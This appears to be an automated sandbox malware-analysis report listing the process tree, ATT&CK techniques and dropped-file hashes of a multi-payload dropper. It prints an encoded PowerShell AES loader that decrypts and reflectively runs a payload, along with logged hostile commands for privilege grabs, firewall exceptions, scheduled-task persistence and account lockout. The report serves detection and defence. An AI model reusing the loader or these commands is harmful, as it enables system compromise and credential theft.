ABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3000 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_8ed144d6-c9c3-4292-a751-a44bc90fd9d9\caller.cmd" "4⤵PID:1852
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\ac3.exeac3.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1516
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\shell1.ps1"3⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3020
-
-
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1604
-
-
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3528
-
-
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3892
-
-
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3856
-
-
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4024
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3988
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1692
-
-
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:1856
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:3104
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:3524
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\freebobux.exefreebobux.exe3⤵
- Executes dropped EXE
PID:3400 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7253.tmp\freebobux.bat""4⤵
- Loads dropped DLL
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\7253.tmp\CLWCP.execlwcp c:\temp\bg.bmp5⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:3124
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7253.tmp\x.vbs"5⤵PID:1628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\SolaraBootstraper.exeSolaraBootstraper.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3744 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1484 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
-
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2444 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1940
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctfmon.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\wim.dllwim.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1904 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_076b76b3-e4d0-4088-8fbf-b1a8bb819b9b\load.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:2292 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_076b76b3-e4d0-4088-8fbf-b1a8bb819b9b\cringe.mp4"5⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1372
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_076b76b3-e4d0-4088-8fbf-b1a8bb819b9b\lol.ini5⤵PID:3704
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_076b76b3-e4d0-4088-8fbf-b1a8bb819b9b\mailgooglecom.json5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3896
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_076b76b3-e4d0-4088-8fbf-b1a8bb819b9b\CLOCK.py5⤵
- Modifies registry class
PID:2056
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\xcer.cer3⤵
- System Location Discovery: System Language Discovery
PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\f3cb220f1aaa32ca310586e5f62dcab1.exef3cb220f1aaa32ca310586e5f62dcab1.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3976 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/account4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3368 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3368 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3728
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3680 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3680 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3668
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/4⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3560 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3560 CREDAT:275457 /prefetch:25⤵
- Suspicious use of SetWindowsHookEx
PID:3452
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3560 CREDAT:209941 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3384
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3316
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:2572
-
-
C:\Windows\SysWOW64\regedit.exeregedit3⤵
- System Location Discovery: System Language Discovery
- Runs regedit.exe
PID:1704
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\WinSxS C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2912
-
-
C:\Windows\SysWOW64\xcopy.exexcopy regmess.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:1600
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\jaffa.exejaffa.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:864 -
C:\Windows\SysWOW64\ndrhuzubnp.exendrhuzubnp.exe4⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1320 -
C:\Windows\SysWOW64\gjiuvdvi.exeC:\Windows\system32\gjiuvdvi.exe5⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2116
-
-
-
C:\Windows\SysWOW64\bupqjacxngvmelo.exebupqjacxngvmelo.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3592
-
-
C:\Windows\SysWOW64\gjiuvdvi.exegjiuvdvi.exe4⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1364
-
-
C:\Windows\SysWOW64\kihaslfgtkziw.exekihaslfgtkziw.exe4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3316
-
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Windows\mydoc.rtf"4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:920 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵PID:3608
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\helper.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:3912
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\jkka.exejkka.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2840 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"4⤵
- Drops startup file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:2440 -
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2412 -
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:4052
-
-
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 4052 2596156626⤵
- Executes dropped EXE
PID:1708
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fontdrvhost.exe3⤵
- Kills process with taskkill
PID:3976
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\selfaware.exeselfaware.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\selfaware.exeselfaware.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:3088 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\db12d699-633c-499d-af36-d22645a97118" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1848
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\selfaware.exe"C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\selfaware.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\selfaware.exe"C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\selfaware.exe" --Admin IsNotAutoStart IsNotTask6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3748 -
C:\Users\Admin\AppData\Local\0117ea87-ea27-4075-bdc5-ed901cf3d4d4\build3.exe"C:\Users\Admin\AppData\Local\0117ea87-ea27-4075-bdc5-ed901cf3d4d4\build3.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3884 -
C:\Users\Admin\AppData\Local\0117ea87-ea27-4075-bdc5-ed901cf3d4d4\build3.exe"C:\Users\Admin\AppData\Local\0117ea87-ea27-4075-bdc5-ed901cf3d4d4\build3.exe"8⤵
- Executes dropped EXE
PID:3936 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1168
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
PID:3508
-
-
C:\Windows\SysWOW64\net.exenet user Admin /active:no3⤵PID:4060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /active:no4⤵PID:4040
-
-
-
C:\Windows\SysWOW64\net.exenet user DefaultAccount /active:yes3⤵
- System Location Discovery: System Language Discovery
PID:4028 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user DefaultAccount /active:yes4⤵PID:2272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\87a4598d-b661-4080-9baa-a09afd26b08d\packer.exe"C:\Users\Admin\AppData\Local\Temp\87a4598d-b661-4080-9baa-a09afd26b08d\packer.exe" "C:\Users\Admin\AppData\Local\Temp\87a4598d-b661-4080-9baa-a09afd26b08d\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "!main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28" "" True True False 0 -repack2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3124
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2972 CREDAT:275457 /prefetch:22⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2604
-
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1728
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:3484
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x1e41⤵PID:1208
-
C:\Windows\system32\taskeng.exetaskeng.exe {97D66531-664E-4FFF-975B-02EC33265406} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]1⤵PID:3096
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3976 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:2220 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1176
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2272 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
PID:3440
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
9Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
2Install Root Certificate
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Password Policy Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
5Remote System Discovery
1System Information Discovery
6System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD56bb0ab3bcd076a01605f291b23ac11ba
SHA1c486e244a5458cb759b35c12b342a33230b19cdf
SHA256959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize252B
MD522cc9ae259e6a9e194294e4ae8e4605b
SHA197fbc78f50ad19060db7a2b4043daccc70164c04
SHA25621ce6ba0ce3cc88a6787969676683c58f16647c07f03fd714d41a7aa6c99db4b
SHA512f25df63ccc98b7bf9afe34c333ed06d8f4e0d6066194686bc16cdcc9f1b8da708ea69f45c89f9d9d78923cefde7d80f55e6c0eaa31fe1ef96784ad09af5ebde5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD59aa3d1fbc923a726e360c40bf15d5bf9
SHA1d1db37576140347ed457bc25ea8c25f936589c9e
SHA2567ab51a0eff476bc3d46b66e952c4290b5caa5cfab0a90eae264ac4c6b97a1503
SHA5125a1834469b52d1fe36000993d84f401e8648aacf14ff755e3751242b5b9daa2a428b922f8c21b237d7bfd763af2494c8b855a6da47bd1e3b8482bdf350878577
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
